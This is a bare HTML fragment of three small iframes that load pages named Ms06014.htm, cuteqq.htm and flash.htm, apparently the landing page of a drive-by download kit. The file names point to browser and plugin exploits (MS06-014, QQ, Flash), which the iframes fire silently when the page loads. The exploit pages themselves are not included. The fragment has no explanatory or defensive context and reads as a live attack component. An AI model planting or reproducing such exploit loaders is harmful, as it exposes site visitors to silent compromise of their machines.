<iframe src=Ms06014.htm width=100 height=100></iframe>
<iframe src=cuteqq.htm width=100 height=100></iframe>
<iframe src=flash.htm width=100 height=100></iframe>
